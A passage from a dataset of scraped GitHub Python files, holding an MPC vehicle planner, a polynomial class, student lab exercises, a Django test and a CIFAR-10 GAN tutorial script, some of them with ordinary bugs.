# 状态与动作约束条件的上界\n ubw = [] # upper bound for state and action constraints\n # 距离约束条件的下界\n lbg = [] # lower bound for distance constraint\n # 距离约束条件的上界\n ubg = [] # upper bound for distance constraint\n # 动力学约束条件\n G = [] # dynamic constraints ( reduce the nonlinear of the original NLP)\n # 目标函数/代价函数\n J = 0 # accumulated cost\n\n # Initial conditions\n # casadi框架下初始化状态,取名X0\n Xk = MX.sym('X0', self.STATE_DIM)\n # 添加优化目标:车辆初始状态\n w += [Xk]\n # 添加初始状态的约束条件(初始状态是自约束,上下界都是本身)\n lbw += x_init[:6]\n ubw += x_init[:6] # force the X0 = x_init\n\n # 得到casadi框架下的变量g\n g = vertcat(*self.dynamics.construct_sur_constraints(x))\n # casadi框架下创建一个函数G_f,命名为\"Gf\" :描述casadi框架下变量 “x” 与 “g” 的关系(通过x构造g)\n G_f = Function('Gf', [x], [g])\n\n # 遍历预测步长,添加优化目标和约束条件:\n for k in range(1, self.horizon + 1):\n # Local control\n # casadi框架下: 声明控制变量U0~Un\n Uname = 'U' + str(k - 1)\n Uk = MX.sym(Uname, self.ACTION_DIM)\n # 添加优化目标/对象(自车动作)\n w += [Uk]\n # 添加动作约束的上下界\n lbw += [-0.4, -4.] # todo: action constraints\n ubw += [0.4, 2.]\n\n # 调用casadi框架下声明的函数F,实质是实现自车状态的一步预测\n Fk = F(Xk, Uk)\n # 调用casadi框架下声明的函数G_f,实质是实现周车状态的一步预测\n Gk = G_f(Xk)\n # 周车递推一步,改变周车状态\n self.dynamics.vehs_pred()\n # casadi框架下: 声明自车状态变量X0~Xn\n Xname = 'X' + str(k)\n Xk = MX.sym(Xname, self.STATE_DIM)\n\n # Dynamic Constraints\n # 自车状态递推一步后的自约束:上下界都是0 (通过规定上下界都是0,使状态最优解唯一:解为模型递推结果本身)\n G += [Fk - Xk] # ego vehicle dynamic constraints\n lbg += [0.0] * self.STATE_DIM\n ubg += [0.0] * self.STATE_DIM\n # 自车与周车距离的上下界约束:为达到安全距离,给一个非负范围\n G += [Gk] # surrounding vehicle constraints\n lbg += [0.0] * (4 * 4)\n ubg += [inf] * (4 * 4)\n # 添加优化目标/对象(自车状态) : 这里第一维状态范围是[0~8],其他是正负无穷\n w += [Xk]\n lbw += [0.] 
+ [-inf] * (self.STATE_DIM - 1) # speed constraints\n ubw += [8.] + [inf] * (self.STATE_DIM - 1)\n\n # casadi框架下创建一个函数F_cost,命名为\"F_cost\" :描述casadi框架下变量 “x” “u” 与 “x^TQX + u^TRu”的关系\n # todo:1. 如果x,u维数固定,最好写成 x^TQX + u^TRu; 2.\n\n # Cost function\n F_cost = Function('F_cost', [x, u], [0.05 * power(x[0]-ref_path[3][k], 2)\n + 0.8 * power(x[3] - ref_path[0][k], 2)\n + 0.8 * power(x[4] - ref_path[1][k], 2)\n + 30 * power((x[5] - ref_path[2][k]) * np.pi / 180., 2)\n + 0.02 * power(x[2], 2)\n + 5 * power(u[0], 2)\n + 0.05 * power(u[1], 2)\n ]) # TODO: cost的形式没有改正确,重点是自车状态和ref没有确定\n # 叠加每步的“代价”,组成代价函数\n J += F_cost(w[k * 2], w[k * 2 - 1])\n\n # Create NLP solver\n # 构造casadi框架下的优化问题:优化对象为f = J, 约束条件为g = G, 求解/优化结果为x = w\n nlp = dict(f=J, g=vertcat(*G), x=vertcat(*w))\n # 构造casadi框架下的求解器: 取名'S', 内置求解器‘ipopt’, 其他配置:self._sol_dic\n S = nlpsol('S', 'ipopt', nlp, self._sol_dic)\n\n # load constraints and solve NLP\n # 为casadi框架下的求解器添加约束条件,得到求解/优化结果\n r = S(lbx=vertcat(*lbw), ubx=vertcat(*ubw), x0=XO, lbg=vertcat(*lbg), ubg=vertcat(*ubg))\n\n # 提取求解结果,state_all为求解得到的自车状态和动作序列\n state_all = np.array(r['x'])\n # 提取求解结果,g_all为求解得到的周车信息序列\n g_all = np.array(r['g'])\n # 得到大小为(预测步数,状态维数)的数组\n state = np.zeros([self.horizon, self.STATE_DIM])\n # 得到大小为(预测步数,动作维数)的数组\n control = np.zeros([self.horizon, self.ACTION_DIM])\n # 得到大小为(预测步数,状态维数+动作维数)的数组\n nt = self.STATE_DIM + self.ACTION_DIM # total variable per step\n # 提取求解结果,cost为求解得到“代价”序列\n cost = np.array(r['f']).squeeze(0)\n\n # 将得到的序列信息存起来\n # save trajectories\n for i in range(self.horizon):\n state[i] = state_all[nt * i: nt * (i + 1) - self.ACTION_DIM].reshape(-1)\n control[i] = state_all[nt * (i + 1) - self.ACTION_DIM: nt * (i + 1)].reshape(-1)\n return state, control, state_all, g_all, cost\n\n\n\n# 类\nclass Processor(object):\n\n # 初始化\n def __init__(self):\n # self.ego_xy = cur_position\n # self.nav_data = nav # nav is a dict\n # self.sensor_data = sensor # ?\n # 预测 时域/步数\n self.horizon = 20\n # self.exp_v = 10 # m/s\n # s 离散时间间隔\n self.tau = 0.1\n self.out_20_point = None\n\n # 获取参考路径轨迹\n def get_trajs(self):\n trajs = [{},{},{}]\n ref_points = []\n self.nav_data['ref_points'] = ref_points\n for i in ref_points:\n for j in ref_points[i]:\n trajs[i]['path'] = ref_points[i][j][:,0:42:2]\n trajs[i]['dead_dist'] = self.nav_data['dead_dist']\n return trajs\n\n # 找到最近的车辆\n def get_nearest_vehs(self):\n\n '''\n sensor_data is a dict\n input: sensor_data-->{'ego_data':np.array([x,y,v_x,v_y,phi,r]),'sur_data':np.array([[x,y,v_y,phi,r],[]....])}\n output:init_states-->np.array([...]) 36dim\n\n '''\n ego_data = []\n sur_data = []\n init_states = []\n tep = []\n self.sensor_data['ego_data'] = ego_data\n self.sensor_data['sur_data'] = sur_data\n if self.sensor_data['sur_data'].shape[0] > 6:\n for i in range(self.sensor_data['sur_data'].shape[0]):\n dis = np.sum(np.square(ego_data[:2]-sur_data[i][:2]))\n tep.append([dis, i])\n\n tep.sort()\n\n for i in range(6):\n init_states = ego_data\n init_states.append(sur_data[tep[i][1]])\n else:\n init_states = ego_data\n init_states.append(sur_data)\n\n return np.array(init_states)\n\n\n\n# 将航向角约束在[-180°,180°]\ndef deal_with_phi(phi):\n # casadi函数: if_else(DM cond, DM if_true, DM if_false, bool short_circuit) -> DM\n return if_else(phi > 180, phi - 360, if_else(phi < -180, phi + 360, phi))\n\n\nif __name__ == '__main__':\n Decision = Decision()\n ego_data = np.array([3, 0, 0, 0, 0, 0])\n # sur_data = np.array([[5, 0, 10, 0], [10, 5, 10, 0], [5, 0, 10, 0], [2, -4, 10, 0],\n # [0, 10, 10, 0], [0, 20, 10, 0]])\n sur_data = 
np.array([[10, 0, 0, 8], [10, 0, 0, 10], [10, 0, 0, 10], [10, 0, 0, 10]])#, [10, 0, 0, 10], [10, 0, 0, 10]]) # x,y,v,phi\n    init_state = np.concatenate((ego_data, sur_data.flatten()), axis=0).tolist()\n    ref_path = np.array([[0.3*i, 0, 0, 3] for i in range(21)]).T # x, y, phi, v\n    ref_path = ref_path.tolist()\n    # state, control, state_all, g_all, cost = Decision.update(init_state, ref_path)\n    t1 = time.time()\n    state, control, state_all, g_all, cost = Decision.update(init_state, ref_path)\n    t2 = time.time()\n    print(t2-t1)\n\n\n","repo_name":"SuirongYi/test1","sub_path":"decision_module1.py","file_name":"decision_module1.py","file_ext":"py","file_size_in_byte":20037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4975434113","text":"from __future__ import annotations\n\nimport itertools\nimport math\nimport re\nfrom fractions import Fraction\n\nfrom iter_helpers import iter_2partitions\nfrom number import stirlingI\n\nNumber = int | Fraction\n\n\nclass Polynomial:\n    \"\"\"Class for a polynomial with rational coefficients.\"\"\"\n\n    def __init__(self, *coefficients: Number) -> None:\n        self.coefficients: list[Number] = [\n            coefficient if isinstance(coefficient, int) else Fraction(coefficient)\n            for coefficient in coefficients\n        ]\n        if not self.coefficients:\n            self.coefficients.append(0)\n\n    def __repr__(self) -> str:\n        return \"Polynomial(\" + \",\".join(str(coeff) for coeff in self.coefficients) + \")\"\n\n    def __str__(self) -> str:\n        s = \"\".join(\n            f\"{'+' if coeff > 0 else '-'}{abs(coeff)}x^{power}\"\n            for power, coeff in enumerate(self.coefficients)\n            if coeff != 0\n        )\n        s = re.sub(r\"\\^1(?!\\d)\", \"\", s, 1)  # Fix x^1\n        s = re.sub(r\"x\\^0\", \"\", s, 1)  # Fix x^0\n        s = re.sub(r\"(?<=.)([+-])\", r\" \\1 
\", s) # Put spaces between signs\n s = re.sub(r\"^\\+\", \"\", s, 1) # Remove leading +\n if not s:\n return \"0\"\n return s\n\n def __getitem__(self, key: int) -> Number:\n return self.coefficients[key]\n\n def __iter__(self):\n return iter(self.coefficients)\n\n @property\n def degree(self) -> int:\n return len(self.coefficients) - 1\n\n def _truncate(self) -> Polynomial:\n \"\"\"Remove leading zeros\"\"\"\n\n while len(self.coefficients) > 1 and self.coefficients[-1] == 0:\n self.coefficients.pop()\n\n return self\n\n def __call__(self, x: Number) -> Number:\n \"\"\"Evaluate polynomial at a given point\"\"\"\n\n res = 0\n for coefficient in reversed(self.coefficients):\n res = coefficient + x * res\n return res\n\n def __add__(self, other: Polynomial | Number) -> Polynomial:\n if isinstance(other, Number):\n other = Polynomial(other)\n if isinstance(other, Polynomial):\n res = Polynomial(\n *[\n coef1 + coef2\n for coef1, coef2 in itertools.zip_longest(\n self.coefficients, other.coefficients, fillvalue=0\n )\n ]\n )\n res._truncate()\n return res\n return NotImplemented\n\n __radd__ = __add__\n\n def __neg__(self) -> Polynomial:\n return Polynomial(*[-coeff for coeff in self.coefficients])\n\n def __sub__(self, other: Polynomial | Number) -> Polynomial:\n if isinstance(other, Number):\n other = Polynomial(other)\n if isinstance(other, Polynomial):\n res = Polynomial(\n *[\n coef1 - coef2\n for coef1, coef2 in itertools.zip_longest(\n self.coefficients, other.coefficients, fillvalue=0\n )\n ]\n )\n res._truncate()\n return res\n return NotImplemented\n\n def __rsub__(self, other: Polynomial | Number) -> Polynomial:\n return (-1) * self + other\n\n def __mul__(self, other: Polynomial | Number) -> Polynomial:\n if other == 0:\n return Polynomial()\n if isinstance(other, Number):\n return Polynomial(*[other * coeff for coeff in self.coefficients])\n if isinstance(other, Polynomial):\n bounds = (self.degree, other.degree)\n return Polynomial(\n *[\n sum(\n self[i] * other[j]\n for i, j in iter_2partitions(n, bounds=bounds)\n )\n for n in range(self.degree + other.degree + 1)\n ]\n )\n return NotImplemented\n\n __rmul__ = __mul__\n\n def __pow__(self, power: int) -> Polynomial:\n n = self.degree\n\n P = [self.coefficients[0] ** power]\n\n for k in range(1, power * n + 1):\n P.append(\n sum(\n (power * (k - i) - i) * self.coefficients[k - i] * P[i]\n for i in range(max(0, k - n), k)\n )\n / (k * self.coefficients[0])\n )\n\n if all(isinstance(coeff, int) for coeff in self.coefficients):\n P = [int(p) for p in P]\n\n return Polynomial(*P)\n\n def __truediv__(self, other: Number) -> Polynomial:\n if isinstance(other, Number):\n return Polynomial(\n *[Fraction(coefficient, other) for coefficient in self.coefficients]\n )\n return NotImplemented\n\n def __floordiv__(self, other: Polynomial) -> Polynomial:\n if not isinstance(other, Polynomial):\n return NotImplemented\n P, _ = divmod(self, other)\n return P\n\n def __mod__(self, other: Polynomial) -> Polynomial:\n if not isinstance(other, Polynomial):\n return NotImplemented\n _, Q = divmod(self, other)\n return Q\n\n def __divmod__(self, other: Polynomial) -> tuple[Polynomial, Polynomial]:\n dividend = self.coefficients.copy()\n quotient_degree = self.degree - other.degree\n if quotient_degree < 0:\n return Polynomial(), self\n\n quotient: list[Number] = [0] * (quotient_degree + 1)\n for k in range(quotient_degree + 1):\n d = Fraction(dividend[-k - 1], other.coefficients[-1])\n for i, c in enumerate(other.coefficients):\n 
dividend[quotient_degree - k + i] -= c * d\n quotient[-k - 1] = d\n\n Q = Polynomial(*quotient)\n D = Polynomial(*dividend)\n D._truncate()\n return Q, D\n\n def __eq__(self, other: Polynomial | Number) -> bool:\n if not isinstance(other, Polynomial):\n if self.degree != 0:\n return False\n return self.coefficients[0] == other\n\n if self.degree != other.degree:\n return False\n\n return all(\n coef1 == coef2\n for coef1, coef2 in zip(self.coefficients, other.coefficients)\n )\n\n def copy(self) -> Polynomial:\n return Polynomial(*self.coefficients.copy())\n\n def to_integer(self) -> Polynomial:\n denominators = [\n coeff.denominator\n for coeff in self.coefficients\n if isinstance(coeff, Fraction)\n ]\n factor = math.lcm(*denominators)\n return Polynomial(*[int(factor * coeff) for coeff in self.coefficients])\n\n def to_monic(self) -> Polynomial:\n factor = Fraction(1, self.coefficients[-1])\n return Polynomial(*[Fraction(coeff) * factor for coeff in self.coefficients])\n\n def gcd(self, other: Polynomial) -> Polynomial:\n a, b = self, other\n while b != 0:\n a, b = b, a % b\n return a.to_monic()\n\n def get_coprimes_and_gcd(\n self, other: Polynomial\n ) -> tuple[Polynomial, Polynomial, Polynomial]:\n gcd = self.gcd(other)\n return self // gcd, other // gcd, gcd\n\n def diff(self, order: int = 1) -> Polynomial:\n if order < 0:\n raise ValueError\n if order == 0:\n return self\n if order > self.degree:\n return Polynomial()\n\n falling_factorial = Polynomial.falling_factorial(order)\n return Polynomial(\n *[\n self.coefficients[k] * falling_factorial(k)\n for k in range(order, self.degree + 1)\n ]\n )\n\n def integral(\n self, order: int = 1, constants: list[Number] | None = None\n ) -> Polynomial:\n if order < 0:\n raise ValueError\n if order == 0:\n return self\n\n if constants is None:\n constants_part = [0] * order\n elif len(constants) != order:\n raise ValueError(\"Constants length must be equal to order\")\n else:\n constants_part = []\n f = Fraction(1)\n for i, constant in enumerate(constants):\n f = f / i if i != 0 else f\n constants_part.append(f * constant)\n\n rising_factorial = Polynomial.rising_factorial(order)\n\n integral_part = [\n Fraction(coeff) / rising_factorial(k + 1)\n for k, coeff in enumerate(self.coefficients)\n ]\n return Polynomial(*constants_part, *integral_part)\n\n @classmethod\n def falling_factorial(cls, power: int) -> Polynomial:\n if power < 0:\n raise ValueError(power)\n return cls(*[stirlingI(power, k) for k in range(power + 1)])\n\n @classmethod\n def rising_factorial(cls, power: int) -> Polynomial:\n if power < 0:\n raise ValueError(power)\n return cls(*[abs(stirlingI(power, k)) for k in range(power + 1)])\n","repo_name":"kirill-varchenko/math_playground","sub_path":"functions/polynomial.py","file_name":"polynomial.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15657133521","text":"# Matthew Lingle\n# ​ CSCI 102 – Section C\n# Week 11 Lab\n# References: None\n# Time: 45 minutes\ndef to_hex(decimal):\n sixtenth=decimal//16\n ones=decimal%16\n list1=['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F']\n hex1=list1[sixtenth]\n hex2=list1[ones]\n return hex1+hex2\ndef rgb_to_hex(rgb):\n red_hex=to_hex(rgb[0])\n green_hex=to_hex(rgb[1])\n blue_hex=to_hex(rgb[2])\n return 
red_hex+green_hex+blue_hex\n\n\n","repo_name":"mlingle/101-102-labs","sub_path":"lab102(11).py","file_name":"lab102(11).py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33900640956","text":"import numpy as np\n\ndt = 0.01\na = 0.99\nv = 5\nw = 3.449\n\nA = np.array([[1, dt, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [0, 0, 1, dt, 0, 0],\n [0, 0, 0, 0, v, 0],\n [0, 0, 0, 0, 1, dt],\n [0, 0, 0, 0, 0, a]])\n\nB = np.array([[0], [0], [0], [0], [0], [v * (1 - a) / w]])\nC = np.array([[0, 0, 1, 0, 0, 0]])\nQ = np.array([[10]])\nR = np.array([[0.5]])\n\nNp = 10\nNc = 4\n\nCA = C @ A\nF = np.array(CA)\nfor i in range(Np-1):\n CA = CA @ A\n F = np.append(F, CA, 0)\n\nCA = C\nphi = np.zeros((Np, Nc))\n\nfor i in range(Np):\n for j in range(Nc):\n CAB = CA @ B\n if (i + j + 1) <= phi.shape[0] and (j + 1) <= phi.shape[1]:\n phi[i+j, j] = CAB[0, 0]\n else:\n break\n CA = CA @ A\n\nR_bar = 0.5 * np.eye(Nc)\nRs = np.ones((Np, 1))\nx = np.transpose(np.array([[0, 10, 0, 0, 0, 0]]))\ndelta_u = np.linalg.inv(phi.transpose() @ phi + R_bar) @ phi.transpose() @ (Rs - F @ x)\nprint(F)\nprint(phi)\nprint(delta_u)","repo_name":"ryannguyen94/VehicleSim","sub_path":"VehicleSim/mpc.py","file_name":"mpc.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29325101649","text":"telefono = int(input('Ingrese numero telefonico: '))\nhora = int(input('Ingrese hora de la llamada: '))\n\n## número mas chico q puedo escribir con 8 cifras: 10000000 (si le resto 1: 9999999)\n## número mas grande q puedo escribir con 8 cifras: 99999999 (si le sumo 1: 100000000)\n\nif 10000000 <= telefono <= 99999999 and 0 <= hora <= 23:\n\n ## COND1: Si la llamada ocurre entre 00:00 y 07:00,\n ## la contestas ya que podría ser una emergencia.\n ## if hora >= 0 and hora <= 7: (TAMBIÉN SIRVE)\n\n if 0 <= hora <= 7:\n print('Resultado: CONTESTAR')\n\n ## COND2: Si la llamada ocurre antes de las 14:00\n ## no la contestas, excepto si el número termina en 909.\n\n if 7 < hora < 14:\n\n tresUltimosDigitos = telefono%1000 ## Con % consigo los ultimos digitos\n\n if tresUltimosDigitos == 909:\n print('Resultado: CONTESTAR')\n else: \n print('Resultado: NO CONTESTAR')\n\n ## COND3: Durante la tarde, solamente contestas entre 17:00 y 19:00,\n ## exceptuando un número que comienza por 877.\n\n if 14 <= hora < 17:\n print('Resultado: NO CONTESTAR')\n\n if 17 <= hora <= 19:\n\n tresPrimerosDigitos = telefono//100000 ## Con // obtengo el numero sin los 5 digitos de la derecha\n\n if tresPrimerosDigitos == 877:\n print('Resultado: NO CONTESTAR')\n else:\n print('Resultado: CONTESTAR')\n\n ## COND4: Después de las 19:00, no contestas el celular.\n if 19 < hora <= 23:\n print('Resultado: NO CONTESTAR')\n\nelse:\n print('Alguno de los valores ingresados')","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej2/hito1_ej2_faf7eb2aded7151922a8a27de9fc0aa2.py","file_name":"hito1_ej2_faf7eb2aded7151922a8a27de9fc0aa2.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26998910579","text":"import pytest\nfrom freezegun import freeze_time\n\nfrom goals.serializers import GoalCategorySerializer\n\n\n@freeze_time(\"2023-03-10 03:21:34\", tz_offset=-4)\n@pytest.mark.django_db\ndef test_goal_category_list(client_api, board_factory, user, goal_category_factory):\n 
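The loops in the MPC snippet above build the standard prediction matrices F (stacked C·A^i) and Φ (a lower-triangular block of impulse responses C·A^(i−j)·B). An equivalent, more direct construction, as a sketch (`prediction_matrices` is a hypothetical helper, less efficient but easier to verify):

```python
import numpy as np

# Equivalent construction of the prediction matrices used above (sketch):
# F[i] = C @ A**(i+1), and Phi[i, j] = C @ A**(i-j) @ B for j <= i.
def prediction_matrices(A, B, C, Np, Nc):
    F = np.vstack([C @ np.linalg.matrix_power(A, i + 1) for i in range(Np)])
    Phi = np.zeros((Np, Nc))
    for i in range(Np):
        for j in range(min(i + 1, Nc)):
            Phi[i, j] = (C @ np.linalg.matrix_power(A, i - j) @ B)[0, 0]
    return F, Phi
```

For the final step, `np.linalg.solve(Phi.T @ Phi + R_bar, Phi.T @ (Rs - F @ x))` is numerically preferable to forming the inverse explicitly.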
board = board_factory.create(with_owner=user)\n\n goal_category = goal_category_factory.create(title='Тестовая категория из теста', user=user, board=board)\n\n expected_response = [\n GoalCategorySerializer(goal_category).data\n ]\n client_api.force_login(user)\n response = client_api.get('/goals/goal_category/list')\n\n assert response.status_code == 200\n assert response.data == expected_response\n","repo_name":"BityutskiyNA/-sky_pro_todolist-","sub_path":"todolist/tests/goal/goal_category_list_view_test.py","file_name":"goal_category_list_view_test.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16019584235","text":"# example of training the discriminator model on real and random cifar10 images\nfrom numpy import expand_dims\nfrom numpy import ones\nfrom numpy import zeros\nfrom numpy import where\nfrom numpy.random import rand\nfrom numpy.random import randn\nfrom numpy.random import randint\nfrom keras.datasets.cifar10 import load_data\nfrom keras.optimizers import Adam\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Conv2D\nfrom keras.layers import Flatten\nfrom keras.layers import Reshape\nfrom keras.layers import Dropout\nfrom keras.layers import LeakyReLU\nfrom keras.layers import Conv2DTranspose\nfrom matplotlib import pyplot\nimport NamedEntityMatching as NER\n\n\n#link to the lecture where this code is from\n#https://machinelearningmastery.com/how-to-develop-a-generative-adversarial-network-for-a-cifar-10-small-object-photographs-from-scratch/\n\n\n\n# example of loading the cifar10 dataset\n#Keras will automatically download a compressed version of the images and save them under your home directory in ~/.keras/datasets/\nfrom keras.datasets.cifar10 import load_data\n\n'''\n# load the images into memory\n(trainX, trainy), (testX, testy) = load_data()\n# summarize the shape of the dataset\nprint('Train', trainX.shape, trainy.shape)\nprint('Test', testX.shape, testy.shape)\n'''\n\nobjectnameDict = {\n 'airplane': 0,\n 'automobile': 1,\n 'bird': 2,\n 'cat': 3,\n 'deer': 4,\n 'dog': 5,\n 'frog': 6,\n 'horse': 7,\n 'ship': 8,\n 'truck': 9\n}\n\n\n#tutorial for centering and normalizing images\n#https://machinelearningmastery.com/how-to-manually-scale-image-pixel-data-for-deep-learning/\n# load and prepare cifar10 training images\n#We are scaling the images in the pixel range [-1,1] because our generator model will be using\n#the tanh activation function, so the pixel range will be [-1,1] for the fake images.\ndef load_real_samples(object):\n # load cifar10 dataset\n (trainX, trainY), (_, _) = load_data()\n # convert from unsigned ints to floats\n X = []\n for i in range(len(trainY)):\n if trainY[i][0]==objectnameDict[object]:\n X.append(trainX[i])\n X = trainX.astype('float32')\n # scale from [0,255] to [-1,1]\n X = (X - 127.5) / 127.5\n return X\n\n\n#We will use some real images from the CIFAR-10 dataset and some fake images to train our\n#discriminative model. We will use random sampling to choose images for stochastic gradient \n#descent. 
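One thing to watch in `load_real_samples` above: the per-class filtering loop fills `X`, but the following `X = trainX.astype('float32')` discards that selection, so the function scales and returns every training image regardless of `object`. A corrected sketch (`load_real_samples_for` is a hypothetical name; `class_id` would be `objectnameDict[object]`):

```python
from keras.datasets.cifar10 import load_data

# Per-class CIFAR-10 loader (sketch), keeping the [-1, 1] scaling that
# matches the generator's tanh output range.
def load_real_samples_for(class_id):
    (trainX, trainY), (_, _) = load_data()
    X = trainX[trainY[:, 0] == class_id].astype('float32')
    return (X - 127.5) / 127.5
```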
We label them with '1'.\n# select real samples\ndef generate_real_samples(dataset, n_samples):\n # choose random instances\n ix = randint(0, dataset.shape[0], n_samples)\n # retrieve selected images\n X = dataset[ix]\n # generate 'real' class labels (1)\n y = ones((n_samples, 1))\n return X, y\n\n\n# use the generator to generate n fake examples, with class labels\n#This is our real generator function. It takes as input n_samples number of points\n#generated from a gaussian distribution. It is upto the generator to find the right \n#distribution from the latent space. The generator will try to update it's weights \n#in such a way so it can generate images that are assigned a probablity closer to 1 \n#by the discriminator.\ndef generate_fake_samples(g_model, latent_dim, n_samples):\n # generate points in latent space\n x_input = generate_latent_points(latent_dim, n_samples)\n # predict outputs\n X = g_model.predict(x_input)\n # create 'fake' class labels (0)\n y = zeros((n_samples, 1))\n return X, y\n\n\n'''\n# generate n fake samples with class labels\n# We dont have a functioning generator model yet, but the actual generator model\n# will generate images using tanh activation function so the pixel range will be [-1,1]\n# and the label of all fake images will be '0'. We are making this dummy generator\n# function that works like that.\ndef generate_fake_samples(n_samples):\n # generate uniform random numbers in [0,1]\n X = rand(32 * 32 * 3 * n_samples)\n # update to have the range [-1, 1]\n X = -1 + X * 2\n # reshape into a batch of color images\n X = X.reshape((n_samples, 32, 32, 3))\n # generate 'fake' class labels (0)\n y = zeros((n_samples, 1))\n return X, y\n'''\n\n\n# train the discriminator model\ndef train_discriminator(model, dataset, n_iter=20, n_batch=128):\n#What is loss and what is accuracy in a model: https://stackoverflow.com/questions/34518656/how-to-interpret-loss-and-accuracy-for-a-machine-learning-model\n half_batch = int(n_batch / 2)\n # manually enumerate epochs\n for i in range(n_iter):\n # get randomly selected 'real' samples\n X_real, y_real = generate_real_samples(dataset, half_batch)\n # update discriminator on real samples\n real_loss, real_acc = model.train_on_batch(X_real, y_real)\n # generate 'fake' examples\n X_fake, y_fake = generate_fake_samples(half_batch)\n # update discriminator on fake samples\n fake_loss, fake_acc = model.train_on_batch(X_fake, y_fake)\n # summarize performance\n print('>%d real=%.0f%% fake=%.0f%%' % (i+1, real_acc*100, fake_acc*100))\n\n\n# # plot images from the training dataset\n# for i in range(49):\n# \t# define subplot\n# #subplots are used to create multiple plots in one plots\n# \tpyplot.subplot(7, 7, 1 + i)\n# \t# turn off axis\n# \tpyplot.axis('off')\n# \t# plot raw pixel data\n# #imshow finishes drawing a picture instead of painting it and show prints it\n# \tpyplot.imshow(trainX[i])\n# pyplot.show()\n\n\n# define the standalone discriminator model\ndef define_discriminator(in_shape=(32,32,3)):\n model = Sequential()\n # normal\n#tutorial to understand convolutional layers: https://machinelearningmastery.com/convolutional-layers-for-deep-learning-neural-networks/\n#tutorial for pooling layers: https://machinelearningmastery.com/pooling-layers-for-convolutional-neural-networks/\n#tutorial for adam: https://machinelearningmastery.com/adam-optimization-algorithm-for-deep-learning/\n#we need a certain filter to extract simple features like detecting horizontal or vertical \n#lines. 
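Note that `train_discriminator` above calls `generate_fake_samples(half_batch)` — the one-argument signature of the commented-out noise stub — while the active definition takes `(g_model, latent_dim, n_samples)`, so the smoke-test loop raises a TypeError unless the stub is restored or the call updated. A sketch of a stub with the matching signature:

```python
from numpy import zeros
from numpy.random import rand

# Noise-only stand-in (sketch): random pixels already scaled to [-1, 1],
# labelled 0, matching the one-argument call in train_discriminator.
def generate_fake_samples(n_samples):
    X = rand(n_samples, 32, 32, 3) * 2.0 - 1.0
    y = zeros((n_samples, 1))
    return X, y
```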
We use more filters to extract out complex patterns and shapes from the image.\n\n#we use down sampling i.e. padding, strides etc to reduce the location dependency \n#of features. Because we just want to detect the presence of these features regardless \n#of where we find them.\n\n#LeakyRelU instead of RelU to avoid the dying RelU problem where once the loss is negative\n#the gradient is zero so the system can never update itself.\n\n#adam takes into account not only what the gradient is but also how fast or slow the \n#gradient is changing. \n#TODO\n#need to read about optimizers and adam more\n model.add(Conv2D(64, (3,3), padding='same', input_shape=in_shape))\n model.add(LeakyReLU(alpha=0.2))\n # downsample\n model.add(Conv2D(128, (3,3), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # downsample\n model.add(Conv2D(128, (3,3), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # downsample\n model.add(Conv2D(256, (3,3), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # classifier\n model.add(Flatten())\n model.add(Dropout(0.4))\n model.add(Dense(1, activation='sigmoid'))\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy'])\n return model\n\n\n# define the standalone generator model\n#deconvolution well explained: https://machinelearningmastery.com/upsampling-and-transpose-convolution-layers-for-generative-adversarial-networks/\n#We use kernel size that is a multiple of stride to avoid deconvolution checkerboard\n#problem. Explained here: https://distill.pub/2016/deconv-checkerboard/\ndef define_generator(latent_dim):\n model = Sequential()\n # foundation for 4x4 image\n n_nodes = 256 * 4 * 4\n model.add(Dense(n_nodes, input_dim=latent_dim))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Reshape((4, 4, 256)))\n # upsample to 8x8\n model.add(Conv2DTranspose(128, (4,4), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # upsample to 16x16\n model.add(Conv2DTranspose(128, (4,4), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # upsample to 32x32\n model.add(Conv2DTranspose(128, (4,4), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # output layer\n model.add(Conv2D(3, (3,3), activation='tanh', padding='same'))\n return model\n\n\n# generate points in latent space as input for the generator\ndef generate_latent_points(latent_dim, n_samples):\n # generate points in the latent space\n x_input = randn(latent_dim * n_samples)\n # reshape into a batch of inputs for the network\n x_input = x_input.reshape(n_samples, latent_dim)\n return x_input\n\n\n# define the combined generator and discriminator model, for updating the generator\n#In our composite gan model we are stacking our generator model and discriminator model \n#together. Our generator will generate fake images and feed it to the discriminator model.\n#The output of the 1st layer which is the generator model will be a 32*32 image with 3 color channels.\n#The will be the input to the discriminator model. The discriminator will output a binary classification.\n#So the output of the whole composite model will be a binary classification. The model will try to\n#minimize its loss based on that output. 
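Because the composite model feeds the generator's output straight into the discriminator, the two halves must agree on tensor shapes (latent vector → 32×32×3 image → probability). A quick hedged compatibility check using the two constructors above:

```python
# Sanity check (sketch): the generator must emit exactly the shape the
# discriminator consumes.
g = define_generator(100)
d = define_discriminator()
assert g.output_shape[1:] == (32, 32, 3)
assert d.input_shape[1:] == (32, 32, 3)
```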
